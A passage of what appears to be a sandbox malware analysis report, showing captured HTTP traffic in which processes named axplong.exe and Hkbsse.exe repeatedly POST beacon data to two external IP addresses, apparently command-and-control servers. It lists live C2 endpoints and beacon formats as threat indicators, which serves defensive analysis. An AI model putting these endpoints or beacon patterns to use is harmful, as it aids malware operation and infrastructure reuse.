                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:35.166210890 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:35 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        98192.168.2.55907077.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:34.268464088 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 65 30 3d 31 30 30 30 32 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: e0=1000227001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:34.973448038 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:34 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        99192.168.2.559072185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:35.283526897 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:35.989394903 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:35 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:35.996546984 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:36.190190077 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:36 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        100192.168.2.559073185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:36.298357010 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:36.949760914 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:36 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        101192.168.2.559074185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:36.963248014 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:37.934604883 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:37 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        102192.168.2.559075185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:38.052774906 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:38.691679001 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:38 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        103192.168.2.559076185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:38.700731993 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:39.347910881 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:39 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        104192.168.2.559077185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:39.474534035 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:40.128680944 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:40 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        105192.168.2.559078185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:40.138581038 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:40.794724941 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:40 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        106192.168.2.559080185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:40.922269106 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:41.742506027 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:41 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        107192.168.2.559081185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:41.754834890 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:42.411128044 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:42 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        108192.168.2.559082185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:42.535804033 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:43.207760096 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:43 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:43.233232021 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:43.441327095 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:43 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        109192.168.2.559083185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:43.553730965 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:44.219024897 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:44 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        110192.168.2.559084185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:44.227744102 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:44.875787020 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:44 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        111192.168.2.559085185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:44.991492033 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:45.634968042 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:45 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        112192.168.2.559086185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:45.754472017 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
